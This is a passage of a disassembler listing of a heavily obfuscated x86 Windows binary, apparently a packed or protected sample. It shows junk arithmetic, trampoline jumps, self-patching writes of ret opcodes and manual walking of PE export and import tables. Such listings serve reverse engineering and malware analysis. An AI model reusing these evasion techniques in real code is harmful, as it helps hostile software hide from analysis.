		jmp	loc_4485F0
; END OF FUNCTION CHUNK	FOR sub_4508C4
; ---------------------------------------------------------------------------
		db 0D9h, 0DFh, 0DBh
dword_4516B8	dd 153970h		; DATA XREF: sub_442A84+4r
					; sub_457A46:loc_448A54r ...
; ---------------------------------------------------------------------------

loc_4516BC:				; CODE XREF: y2kk37jd:00450286j
		jmp	loc_44F027
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F334

loc_4516C1:				; CODE XREF: sub_44F334-FB64j
		jmp	nullsub_110
; END OF FUNCTION CHUNK	FOR sub_44F334
; ---------------------------------------------------------------------------
		dw 7A83h
dword_4516C8	dd 0F2C6EFCEh		; DATA XREF: sub_454187-DEA4w
					; sub_4466E0+Dr ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479FB

loc_4516CC:				; CODE XREF: sub_4479FB:loc_447A12j
		jmp	nullsub_489
; END OF FUNCTION CHUNK	FOR sub_4479FB
; ---------------------------------------------------------------------------

loc_4516D1:				; CODE XREF: y2kk37jd:00441F02j
		jmp	loc_450751
; ---------------------------------------------------------------------------
		dw 1552h
dword_4516D8	dd 0			; DATA XREF: sub_441288+Dw
					; sub_43DE8B:loc_44E8C0r ...
dword_4516DC	dd 0			; DATA XREF: sub_45596A-172C5r
					; sub_43EA8B+7w ...
; ---------------------------------------------------------------------------

loc_4516E0:				; CODE XREF: y2kk37jd:0044298Bj
		jmp	loc_43D8CA
; ---------------------------------------------------------------------------
		db 82h,	0F5h, 25h
dword_4516E8	dd 0			; DATA XREF: y2kk37jd:loc_45BD6Ew
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_4516EC:				; CODE XREF: sub_44C304-108E1j
		jmp	loc_441E49
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
		retf	76ECh
; ---------------------------------------------------------------------------
dword_4516F4	dd 0			; DATA XREF: sub_43E25A:loc_44AAF8r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_4516F8:				; CODE XREF: sub_448700+4EA1j
		lea	eax, loc_45939D
		mov	byte ptr [eax],	0C3h
		jmp	loc_45734D
; END OF FUNCTION CHUNK	FOR sub_448700

; =============== S U B	R O U T	I N E =======================================



sub_451706	proc near		; CODE XREF: sub_414D0E+5Ep
					; sub_41B423+642p ...
		call	sub_451711
		jmp	ds:off_41E07C
sub_451706	endp


; =============== S U B	R O U T	I N E =======================================



sub_451711	proc near		; CODE XREF: y2kk37jd:loc_43BC4Fj
					; y2kk37jd:00448CD5j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044304A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A629 SIZE 0000000E BYTES

		jb	loc_44A629
		pop	edx
		push	offset loc_442D98
		jmp	nullsub_112
sub_451711	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_451722	proc near		; CODE XREF: sub_443E16:loc_441E5Bp
					; y2kk37jd:00449208j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00454AAE SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_454AAE
sub_451722	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_45172E:				; CODE XREF: sub_4507BF+297Ej
		add	eax, 28D10BC4h
		js	loc_456972

loc_45173A:				; CODE XREF: sub_4507BF:loc_44A4CDj
		push	offset loc_44E19B
		jmp	nullsub_113
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_451744:				; CODE XREF: y2kk37jd:loc_446D63j
		push	0E6473677h
		pop	esi
		add	esi, 0EE24B451h
		rol	esi, 0Eh
		xor	esi, 0CED9F31Eh
		jmp	loc_441EAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_45175E:				; CODE XREF: sub_43DF1F+6414j
		jnz	loc_45B4AE
		mov	ecx, 143E7091h
		jmp	loc_45B4A6
; END OF FUNCTION CHUNK	FOR sub_43DF1F
; ---------------------------------------------------------------------------

loc_45176E:				; CODE XREF: y2kk37jd:0044D28Aj
		jle	loc_44D64A
		not	edi
		push	edx
		jmp	loc_44D915
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6BF

loc_45177C:				; CODE XREF: sub_44D6BF-A0A9j
					; y2kk37jd:00451DDDj
		jns	loc_455854
		jmp	loc_457BA3
; END OF FUNCTION CHUNK	FOR sub_44D6BF
; ---------------------------------------------------------------------------

loc_451787:				; CODE XREF: y2kk37jd:0044A300j
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_451788	proc near		; CODE XREF: y2kk37jd:0045ABF1p

; FUNCTION CHUNK AT 004572E0 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	ecx
		lea	eax, sub_442F42
		mov	byte ptr [eax],	0C3h
		jmp	loc_4572E0
sub_451788	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_45179B:				; CODE XREF: sub_448CAE:loc_43CEDEj
		xchg	edx, [esp+0]
		jmp	sub_43BA66
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441856

loc_4517A3:				; CODE XREF: sub_441856+169FAj
		or	edi, esi

loc_4517A5:				; CODE XREF: sub_441856:loc_43BA44j
		mov	eax, [ebp+var_C]
		push	eax
		call	sub_44DB32
; END OF FUNCTION CHUNK	FOR sub_441856
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_4517AE:				; CODE XREF: y2kk37jd:loc_450659j
					; y2kk37jd:0045235Dj ...
		mov	eax, 120h
		call	sub_454413
		jmp	loc_44C260
; END OF FUNCTION CHUNK	FOR sub_457D5A
; ---------------------------------------------------------------------------
		jmp	loc_459807
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E63A

loc_4517C2:				; CODE XREF: sub_44E63A+CA4Bj
		pop	ecx
		and	ecx, 8E1B9A8Ah
		add	ecx, 0F835036Fh
		xchg	ecx, [esp+8+var_8]
		jmp	loc_44C0A6
; END OF FUNCTION CHUNK	FOR sub_44E63A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF5F

loc_4517D7:				; CODE XREF: sub_43BF5F+528Dj
		jg	nullsub_401
		or	ebx, ecx
		mov	esi, ecx
		jmp	loc_45A43C
; END OF FUNCTION CHUNK	FOR sub_43BF5F

; =============== S U B	R O U T	I N E =======================================



sub_4517E6	proc near		; CODE XREF: y2kk37jd:00454776j
					; sub_45689F:loc_455ED8p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F6EE SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_43F6EE
sub_4517E6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F285

loc_4517F2:				; CODE XREF: sub_43F285+8j
		push	edi
		push	353EA42Ch
		pop	edi
		and	edi, 726402DAh
		jmp	loc_4482D5
; END OF FUNCTION CHUNK	FOR sub_43F285
; ---------------------------------------------------------------------------

loc_451804:				; CODE XREF: y2kk37jd:loc_4577F9j
		add	ebx, 0C1AB138Fh
		xchg	ebx, [esp]
		jmp	loc_458E28
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453153

loc_451812:				; CODE XREF: sub_453153:loc_45315Dj
		test	ebx, 20000000h
		jmp	loc_453681
; END OF FUNCTION CHUNK	FOR sub_453153

; =============== S U B	R O U T	I N E =======================================



sub_45181D	proc near		; DATA XREF: y2kk37jd:loc_454302o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004456F6 SIZE 00000019 BYTES

		push	eax
		mov	eax, edx
		xchg	eax, [esp+4+var_4]
		call	sub_4464B3
		mov	eax, 0CB39536Bh
		jmp	loc_4456F6
sub_45181D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_451832:				; CODE XREF: sub_43F8B8:loc_44F7A6j
		jz	loc_44267A
		jmp	loc_43CFE3
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

loc_45183D:				; CODE XREF: y2kk37jd:0045A23Dj
		js	loc_44B80A

; =============== S U B	R O U T	I N E =======================================



sub_451843	proc near		; CODE XREF: y2kk37jd:0045945Dp

; FUNCTION CHUNK AT 00445DCF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454987 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456773 SIZE 00000010 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0
		push	10h
		mov	eax, [ebp-8]
		push	eax
		jmp	loc_454987
sub_451843	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_451854	proc near		; CODE XREF: sub_43FDF2+9j

; FUNCTION CHUNK AT 0043F807 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004457E2 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044F63C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457BC0 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045854A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C47A SIZE 00000020 BYTES

		add	esp, 0FFFFFFE0h

loc_451857:				; CODE XREF: y2kk37jd:loc_45B234j
		jmp	loc_44F63C
sub_451854	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_45185C:				; CODE XREF: sub_4448E2+122BAj
		or	ebp, 6DF6FA48h

loc_451862:				; CODE XREF: sub_4448E2:loc_4433D5j
		push	0F084AAECh
		pop	eax
		sub	eax, 0F57B6059h
		cmp	eax, 6AB1BB3h
		jmp	loc_43F1F7
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_451879:				; CODE XREF: sub_453867-1559Aj
					; sub_4429DD:loc_442943j
		push	esi
		push	698AE62Fh
		pop	esi
		and	esi, 78A356F0h
		test	esi, 4
		jmp	loc_441769
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_451891:				; CODE XREF: sub_43BF31:loc_43BF45j
		jz	loc_44B2DA
		pushf
		jmp	loc_44B2D1
; END OF FUNCTION CHUNK	FOR sub_43BF31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D5A

loc_45189D:				; CODE XREF: sub_444D5A:loc_444D65j
		sub	eax, 33D0C4A9h
		rol	eax, 7
		add	eax, 0C732BFE3h
		xchg	eax, [esp-4+arg_0]
		jmp	nullsub_11
; END OF FUNCTION CHUNK	FOR sub_444D5A
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 0Bh
		mov	ds:dword_444AF4, eax
		jmp	locret_451017

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4518C3	proc near		; CODE XREF: sub_44EE3Dj

; FUNCTION CHUNK AT 0043C379 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043E8A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C9AD SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044CA41 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D463 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044E8A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045101D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004528A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459978 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C1A0 SIZE 00000015 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_44E8A6
sub_4518C3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_4518CB:				; CODE XREF: sub_43B0F5+16FFAj
					; sub_452C4F+19j
		shr	eax, 0Bh
		xor	[ebp-8], eax
		mov	eax, [ebp-8]

loc_4518D4:				; CODE XREF: y2kk37jd:loc_43C187j
		shl	eax, 0Fh
		jmp	loc_44FB17
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447423

loc_4518DC:				; CODE XREF: sub_447423:loc_45B46Aj
		or	eax, 0A2C1F4B7h
		rol	eax, 19h
		add	eax, 224CF641h
		add	eax, ebp
		jmp	loc_445AF2
; END OF FUNCTION CHUNK	FOR sub_447423
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6BF

loc_4518F2:				; CODE XREF: sub_44D6BF-110D3j
		ja	nullsub_466
		popf
		xchg	esi, [edi]
		sbb	edi, 4B78F9A2h
		jmp	loc_450A9F
; END OF FUNCTION CHUNK	FOR sub_44D6BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444000

loc_451906:				; CODE XREF: sub_444000+Cj
		jnz	loc_45C4DA
		jmp	loc_441611
; END OF FUNCTION CHUNK	FOR sub_444000
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_451911:				; CODE XREF: sub_445226:loc_4598D1j
		jnz	loc_457CE0
		jns	loc_43F682
		jmp	loc_445BF6
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_451922:				; CODE XREF: y2kk37jd:0044EFCAj
		sbb	esi, ecx
; START	OF FUNCTION CHUNK FOR sub_445226

loc_451924:				; CODE XREF: sub_445226:loc_44EFBAj
		sub	edi, 509132F6h
		and	edi, 3ED3ECA1h
		xor	edi, 6F6C04F7h
		add	edi, ebp
		add	edi, 0ACD2D386h
		mov	edi, [edi]
		jmp	loc_456629
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_451945:				; CODE XREF: y2kk37jd:00446972j
		jl	loc_450F3D
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_45194B:				; CODE XREF: sub_449E69+D525j
		or	eax, ds:4000EBh
		sub	eax, 95D54C4h
		add	eax, 7A5B22DAh
		add	eax, ebp
		jmp	loc_4575D2
; END OF FUNCTION CHUNK	FOR sub_449E69

; =============== S U B	R O U T	I N E =======================================



sub_451964	proc near		; CODE XREF: y2kk37jd:0044EA42j
					; sub_4429DD+F864p

; FUNCTION CHUNK AT 0043B893 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446FDE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E813 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004554C8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045658A SIZE 00000016 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	ecx, 0F568123Bh
		add	ecx, ebp
		push	edx
		push	0D97CA5A3h
		pop	edx
		or	edx, 7F52ABD6h
		jmp	loc_43B893
sub_451964	endp

; ---------------------------------------------------------------------------

loc_451982:				; CODE XREF: y2kk37jd:0045941Ej
		sbb	ebx, 0E11C0FB1h
		pushf

loc_451989:				; CODE XREF: y2kk37jd:loc_45940Dj
		add	eax, 0DF034A30h
		xor	eax, 4E118CF3h
		jmp	loc_44F9D6
; ---------------------------------------------------------------------------

loc_45199A:				; CODE XREF: y2kk37jd:loc_44DC7Fj
		adc	esi, edi
		or	edx, 0CDB92C85h
		jnp	loc_44E1FC
		mov	[edi], edx
		jmp	loc_4414E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_4519AF:				; CODE XREF: sub_448CAE:loc_450814j
		jz	loc_44E060
		jmp	loc_455ACE
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DC32

loc_4519BA:				; CODE XREF: sub_44DC32+1j
		push	offset sub_45A089
		jmp	nullsub_349
; END OF FUNCTION CHUNK	FOR sub_44DC32
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F618

loc_4519C4:				; CODE XREF: sub_43F618-3520j
		push	638EA403h
		pop	ecx
		rol	ecx, 0Fh
		add	ecx, 91BB4BB8h
		push	offset loc_444D85
		jmp	nullsub_175
; END OF FUNCTION CHUNK	FOR sub_43F618
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448306

loc_4519DD:				; CODE XREF: sub_448306+14A5j
		add	edx, 95AFB074h
		jb	loc_457485

loc_4519E9:				; CODE XREF: y2kk37jd:0045A95Cj
		jmp	sub_45BBF8
; END OF FUNCTION CHUNK	FOR sub_448306
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_4519EE:				; CODE XREF: sub_43BD0D+9325j
		jmp	nullsub_6
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
		rol	ebp, 12h
		jmp	loc_457479
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4564EB

loc_4519FB:				; CODE XREF: sub_4564EB-16988j
		add	ebx, 0F770438Dh
		mov	ebx, [ebx]
		xchg	ebx, [esp+0]
		retn
; END OF FUNCTION CHUNK	FOR sub_4564EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_451A07:				; CODE XREF: sub_43BA66+1D911j
		jmp	nullsub_272
; END OF FUNCTION CHUNK	FOR sub_43BA66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_451A0C:				; CODE XREF: sub_44CF38+AA00j
		jmp	loc_442128
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------

loc_451A11:				; CODE XREF: y2kk37jd:00456AFEj
		jmp	loc_445F4B
; ---------------------------------------------------------------------------
		mov	ds:off_41E12C, eax
		lea	eax, sub_442F52
		mov	byte ptr [eax],	0C3h
		jmp	loc_44E772
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F52

loc_451A2A:				; CODE XREF: sub_442F52+6j
		mov	eax, [esp+0]
		push	esi
		mov	esi, edx
		jmp	loc_4487F3
; END OF FUNCTION CHUNK	FOR sub_442F52

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_451A35	proc near		; CODE XREF: sub_445226:loc_43C515p

; FUNCTION CHUNK AT 0043BBC4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BD86 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BFF4 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043DBAF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DEAB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043E1AD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043FB7A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00442BE8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00445A51 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004461EE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044666A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00447D6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ABDD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D1B5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452D01 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455BE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004577CA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00457EAB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004598D6 SIZE 00000008 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	edi, [esp+0]
		mov	ebp, edi
		pop	edi
		push	458F042Eh
		jmp	loc_43FB7A
sub_451A35	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455E0B

loc_451A4B:				; CODE XREF: sub_455E0B-8FD3j
		shr	esi, 8
		jmp	loc_43DFCD
; END OF FUNCTION CHUNK	FOR sub_455E0B

; =============== S U B	R O U T	I N E =======================================



sub_451A53	proc near		; CODE XREF: y2kk37jd:0043FB2Ej
					; sub_456D3F+48B6p

; FUNCTION CHUNK AT 0045B563 SIZE 00000007 BYTES

		xchg	esi, [esp+0]
		pop	esi
		imul	byte ptr [edx]
		call	sub_44B924

loc_451A5E:				; CODE XREF: sub_43F2F2+15F23j
		jmp	loc_45B563
sub_451A53	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BB55

loc_451A63:				; CODE XREF: sub_43BB55+C0C7j
		jmp	nullsub_305
; END OF FUNCTION CHUNK	FOR sub_43BB55
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_451A68:				; CODE XREF: sub_442A84-3D70j
		jmp	loc_44AA6B
; END OF FUNCTION CHUNK	FOR sub_442A84
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_520. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ds:off_41E1F4, eax
		lea	eax, sub_456A36
		mov	byte ptr [eax],	0C3h
		jmp	loc_44622E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_451A82:				; CODE XREF: sub_456A36+6j
		mov	eax, [esp+0]
		push	edx
		jmp	loc_446BD4
; END OF FUNCTION CHUNK	FOR sub_456A36
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459AB0

loc_451A8B:				; CODE XREF: sub_459AB0+13j
		call	sub_44615F
		mov	edx, [ebx+3Ch]
		mov	edx, [ebx+edx+80h]
		or	edx, edx
		jz	loc_444FA4
; END OF FUNCTION CHUNK	FOR sub_459AB0
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_451AA2:				; CODE XREF: sub_4480CB-6486j
					; sub_4480CB+4606j
		jz	loc_4591A9
		jmp	loc_44FC48
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
		mov	eax, 1AABF86Ch
		call	sub_44113A
		mov	ds:off_41E030, eax

loc_451ABD:				; CODE XREF: y2kk37jd:loc_44F241j
		lea	eax, loc_442446
		mov	byte ptr [eax],	0C3h
		jmp	loc_442446
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F309

loc_451ACB:				; CODE XREF: y2kk37jd:00440D70j
					; sub_44F309+7j
		xchg	eax, [esp+0]
		mov	edx, eax
		call	sub_4581BB
		pop	edx
		pop	eax
		mov	ds:dword_44F4F8, edx
; END OF FUNCTION CHUNK	FOR sub_44F309
; START	OF FUNCTION CHUNK FOR sub_459789

loc_451ADD:				; CODE XREF: sub_459789:loc_446C7Cj
					; y2kk37jd:004495ACj
		xchg	eax, edx
		jmp	loc_44DA3F
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45596A

loc_451AE3:				; CODE XREF: sub_45596A-17394j
		jnb	loc_449049
		jmp	loc_448FDD
; END OF FUNCTION CHUNK	FOR sub_45596A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440040

loc_451AEE:				; CODE XREF: sub_440040:loc_457E81j
		jnz	loc_43BC9F
		jmp	loc_45C6B3
; END OF FUNCTION CHUNK	FOR sub_440040
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EB56

loc_451AF9:				; CODE XREF: sub_44EB56-11A6Dj
		jbe	sub_457F67

loc_451AFF:				; CODE XREF: sub_44EB56:loc_43D0D7j
		sub	eax, 8EF66E48h
		add	eax, 0CCCF8C1Dh
		add	eax, ebp
		jmp	loc_44129C
; END OF FUNCTION CHUNK	FOR sub_44EB56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45392D

loc_451B12:				; CODE XREF: sub_45392D:loc_45889Bj
		and	ebx, 987C4109h
		add	ebx, 0E825E0CCh
		call	sub_450D4C

loc_451B23:				; CODE XREF: y2kk37jd:0043F6B0j
		jmp	nullsub_485
; END OF FUNCTION CHUNK	FOR sub_45392D
; ---------------------------------------------------------------------------
		shr	edx, 4
		mov	eax, 21177EE3h
		jmp	sub_43B8D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A12

loc_451B35:				; CODE XREF: sub_448A12:loc_43BED6j
		or	ecx, ecx
		jz	loc_455EE9
		mov	edx, [ebx+ecx]
		xor	edx, [ebx+ecx+4]
		jmp	loc_45025D
; END OF FUNCTION CHUNK	FOR sub_448A12
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_451B49:				; CODE XREF: sub_4458DD-1BB6j
		pop	esi
		or	esi, 3F0CC8A7h
		add	esi, 59E84E77h

loc_451B56:				; CODE XREF: y2kk37jd:00454A1Bj
		push	offset sub_449641
		jmp	loc_441404
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_451B60:				; CODE XREF: sub_43ED86+8CE9j
		or	eax, 5E759DD6h
		add	eax, 0B47A56D8h
		push	offset sub_447516
		jmp	nullsub_118
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
		mov	eax, 9DD7AB44h
		push	eax
		push	3674463Bh
		pop	eax
		xor	eax, 6125CB3Fh
		and	eax, 5A4C500Bh
		add	eax, 0AE048E4Bh
		xchg	eax, [esp]
		jmp	sub_442C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_451B9C:				; CODE XREF: sub_4458DD+102AEj
		xor	eax, ebx
		pop	ebx
		push	edi
		pushf
		push	0A194189Bh
		pop	edi
		jmp	loc_454E70
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		push	ebx
		push	15A73AF2h
		pop	ebx
		xor	ebx, 0D2B64E9Eh
		push	offset sub_454400
		jmp	loc_446897
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C638

loc_451BC3:				; CODE XREF: sub_43C638+9j
		mov	edx, ebp
		pop	ebp
		mov	eax, [esp-4+arg_0]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+0]
		push	offset sub_43EA11
		jmp	locret_450257
; END OF FUNCTION CHUNK	FOR sub_43C638

; =============== S U B	R O U T	I N E =======================================



sub_451BD9	proc near		; DATA XREF: sub_45380A-24D2o
		mov	eax, ebx
		jmp	loc_440AEA
sub_451BD9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45380A

loc_451BE0:				; CODE XREF: sub_45380A:loc_444FA4j
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		or	ecx, ecx
		jz	loc_440AE8
		jmp	loc_4463D0
; END OF FUNCTION CHUNK	FOR sub_45380A
; ---------------------------------------------------------------------------

loc_451BF4:				; CODE XREF: y2kk37jd:loc_44703Cj
		jl	loc_455336

loc_451BFA:				; CODE XREF: y2kk37jd:00456383j
		jmp	loc_441A8C
; ---------------------------------------------------------------------------
		test	ebx, 24F0493Bh
		jmp	loc_45532E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E9BA

loc_451C0A:				; CODE XREF: sub_44E9BA+12j
		pop	edx
		and	edx, 0E1740F0Fh
		add	edx, 9EE501C0h
		call	sub_458273

loc_451C1C:				; CODE XREF: y2kk37jd:0045C077j
		jmp	nullsub_119
; END OF FUNCTION CHUNK	FOR sub_44E9BA

; =============== S U B	R O U T	I N E =======================================



sub_451C21	proc near		; CODE XREF: sub_4429DD+11DFDp
					; y2kk37jd:00455ADEj

; FUNCTION CHUNK AT 00443B49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D4CA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00451018 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		lea	eax, [ebp-125h]
		push	eax
		call	sub_4476EE
		mov	[ebp-4], eax
		jmp	loc_443B49
sub_451C21	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_451C39:				; CODE XREF: sub_4429DD:loc_44B008j
		lea	eax, [ebp-125h]
		jmp	loc_44F4D8
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
		push	offset sub_446C40
		jmp	loc_45AF9E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_451C4E:				; CODE XREF: sub_43F2F2+C3C2j
		popf
		cmp	edx, 0F72D29Ch
		jmp	loc_452623
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_451C5A:				; CODE XREF: sub_43C851:loc_445746j
		add	edx, edi
		pop	edi
		mov	edx, [edx]
		push	offset sub_457689
		jmp	loc_447AEF
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================



sub_451C69	proc near		; DATA XREF: sub_44472C-3426o
		mov	eax, [eax]
		add	eax, [ebp-4]
		mov	[ebp-0Ch], eax
sub_451C69	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44B47E

loc_451C71:				; CODE XREF: sub_44CEAB-B65Aj
					; sub_44B47E:loc_44D856j ...
